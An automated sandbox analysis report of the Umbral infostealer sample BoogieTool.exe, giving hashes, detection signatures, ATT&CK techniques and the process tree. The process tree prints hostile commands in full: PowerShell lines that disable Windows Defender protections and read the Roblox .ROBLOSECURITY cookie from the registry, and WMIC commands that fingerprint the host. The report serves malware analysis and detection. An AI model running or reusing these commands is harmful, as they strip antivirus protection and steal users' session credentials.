Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
04-09-2024 09:06
Behavioral task
behavioral1
Sample
BoogieTool.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
BoogieTool.exe
Resource
win10v2004-20240802-en
General
-
Target
BoogieTool.exe
-
Size
229KB
-
MD5
a95d6f4a4315650e730488eabbe1a5dc
-
SHA1
dd8358dceb4125cbcc85c2d18721a2ef1aa5b165
-
SHA256
3b97b49496b1d19bd7fec189d26ba0e5ff3051eb759e48cc02c934aceb7868ee
-
SHA512
b3a1822d4426178ceae2ab76597bf072c41cfa374141bc7adfb01dfafcfc443a713d1526e800290afd265cd932ec756235ffde880cf5ab6fd858b2adf1ed619e
-
SSDEEP
6144:tloZMYrIkd8g+EtXHkv/iD4yfqmR/k4XoG/BcoNNKb8e1mwMQi:voZHL+EP8yfqmR/k4XoG/BcoNAKJ
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2632-1-0x0000000000E70000-0x0000000000EB0000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3068 powershell.exe 2924 powershell.exe 2576 powershell.exe 1436 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2872 wmic.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 3068 powershell.exe 2924 powershell.exe 2576 powershell.exe 2468 powershell.exe 1436 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2632 BoogieTool.exe Token: SeDebugPrivilege 3068 powershell.exe Token: SeDebugPrivilege 2924 powershell.exe Token: SeDebugPrivilege 2576 powershell.exe Token: SeDebugPrivilege 2468 powershell.exe Token: SeIncreaseQuotaPrivilege 2004 wmic.exe Token: SeSecurityPrivilege 2004 wmic.exe Token: SeTakeOwnershipPrivilege 2004 wmic.exe Token: SeLoadDriverPrivilege 2004 wmic.exe Token: SeSystemProfilePrivilege 2004 wmic.exe Token: SeSystemtimePrivilege 2004 wmic.exe Token: SeProfSingleProcessPrivilege 2004 wmic.exe Token: SeIncBasePriorityPrivilege 2004 wmic.exe Token: SeCreatePagefilePrivilege 2004 wmic.exe Token: SeBackupPrivilege 2004 wmic.exe Token: SeRestorePrivilege 2004 wmic.exe Token: SeShutdownPrivilege 2004 wmic.exe Token: SeDebugPrivilege 2004 wmic.exe Token: SeSystemEnvironmentPrivilege 2004 wmic.exe Token: SeRemoteShutdownPrivilege 2004 wmic.exe Token: SeUndockPrivilege 2004 wmic.exe Token: SeManageVolumePrivilege 2004 wmic.exe Token: 33 2004 wmic.exe Token: 34 2004 wmic.exe Token: 35 2004 wmic.exe Token: SeIncreaseQuotaPrivilege 2004 wmic.exe Token: SeSecurityPrivilege 2004 wmic.exe Token: SeTakeOwnershipPrivilege 2004 wmic.exe Token: SeLoadDriverPrivilege 2004 wmic.exe Token: SeSystemProfilePrivilege 2004 wmic.exe Token: SeSystemtimePrivilege 2004 wmic.exe Token: SeProfSingleProcessPrivilege 2004 wmic.exe Token: SeIncBasePriorityPrivilege 2004 wmic.exe Token: SeCreatePagefilePrivilege 2004 wmic.exe Token: SeBackupPrivilege 2004 wmic.exe Token: SeRestorePrivilege 2004 wmic.exe Token: SeShutdownPrivilege 2004 wmic.exe Token: SeDebugPrivilege 2004 wmic.exe Token: SeSystemEnvironmentPrivilege 2004 wmic.exe Token: SeRemoteShutdownPrivilege 2004 wmic.exe Token: SeUndockPrivilege 2004 wmic.exe Token: SeManageVolumePrivilege 2004 wmic.exe Token: 33 2004 wmic.exe Token: 34 2004 wmic.exe Token: 35 2004 wmic.exe Token: SeIncreaseQuotaPrivilege 1984 wmic.exe Token: SeSecurityPrivilege 1984 wmic.exe Token: SeTakeOwnershipPrivilege 1984 wmic.exe Token: SeLoadDriverPrivilege 1984 wmic.exe Token: SeSystemProfilePrivilege 1984 wmic.exe Token: SeSystemtimePrivilege 1984 wmic.exe Token: SeProfSingleProcessPrivilege 1984 wmic.exe Token: SeIncBasePriorityPrivilege 1984 wmic.exe Token: SeCreatePagefilePrivilege 1984 wmic.exe Token: SeBackupPrivilege 1984 wmic.exe Token: SeRestorePrivilege 1984 wmic.exe Token: SeShutdownPrivilege 1984 wmic.exe Token: SeDebugPrivilege 1984 wmic.exe Token: SeSystemEnvironmentPrivilege 1984 wmic.exe Token: SeRemoteShutdownPrivilege 1984 wmic.exe Token: SeUndockPrivilege 1984 wmic.exe Token: SeManageVolumePrivilege 1984 wmic.exe Token: 33 1984 wmic.exe Token: 34 1984 wmic.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2632 wrote to memory of 3068 2632 BoogieTool.exe 31 PID 2632 wrote to memory of 3068 2632 BoogieTool.exe 31 PID 2632 wrote to memory of 3068 2632 BoogieTool.exe 31 PID 2632 wrote to memory of 2924 2632 BoogieTool.exe 33 PID 2632 wrote to memory of 2924 2632 BoogieTool.exe 33 PID 2632 wrote to memory of 2924 2632 BoogieTool.exe 33 PID 2632 wrote to memory of 2576 2632 BoogieTool.exe 35 PID 2632 wrote to memory of 2576 2632 BoogieTool.exe 35 PID 2632 wrote to memory of 2576 2632 BoogieTool.exe 35 PID 2632 wrote to memory of 2468 2632 BoogieTool.exe 37 PID 2632 wrote to memory of 2468 2632 BoogieTool.exe 37 PID 2632 wrote to memory of 2468 2632 BoogieTool.exe 37 PID 2632 wrote to memory of 2004 2632 BoogieTool.exe 39 PID 2632 wrote to memory of 2004 2632 BoogieTool.exe 39 PID 2632 wrote to memory of 2004 2632 BoogieTool.exe 39 PID 2632 wrote to memory of 1984 2632 BoogieTool.exe 42 PID 2632 wrote to memory of 1984 2632 BoogieTool.exe 42 PID 2632 wrote to memory of 1984 2632 BoogieTool.exe 42 PID 2632 wrote to memory of 1404 2632 BoogieTool.exe 44 PID 2632 wrote to memory of 1404 2632 BoogieTool.exe 44 PID 2632 wrote to memory of 1404 2632 BoogieTool.exe 44 PID 2632 wrote to memory of 1436 2632 BoogieTool.exe 46 PID 2632 wrote to memory of 1436 2632 BoogieTool.exe 46 PID 2632 wrote to memory of 1436 2632 BoogieTool.exe 46 PID 2632 wrote to memory of 2872 2632 BoogieTool.exe 48 PID 2632 wrote to memory of 2872 2632 BoogieTool.exe 48 PID 2632 wrote to memory of 2872 2632 BoogieTool.exe 48
Processes
-
C:\Users\Admin\AppData\Local\Temp\BoogieTool.exe"C:\Users\Admin\AppData\Local\Temp\BoogieTool.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BoogieTool.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2004
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1436
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2872
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD537ef65c07bcbf42f65e177b78c7608aa
SHA15fc80abb6f5bec394ebb0f768939a13c18e33677
SHA25647a74d054124f0abbff8d3a9b4bfc8a0391740ba730b32306871638b5ab54793
SHA512f2e628fc06dffcc4909a3ca49e2d85c3e0c1200b960fbedc0dca97e20bfabaf588cd49974601c371cd4f90660d81b5cb7b6599c1096ee9cb09fcb03ebd75c83b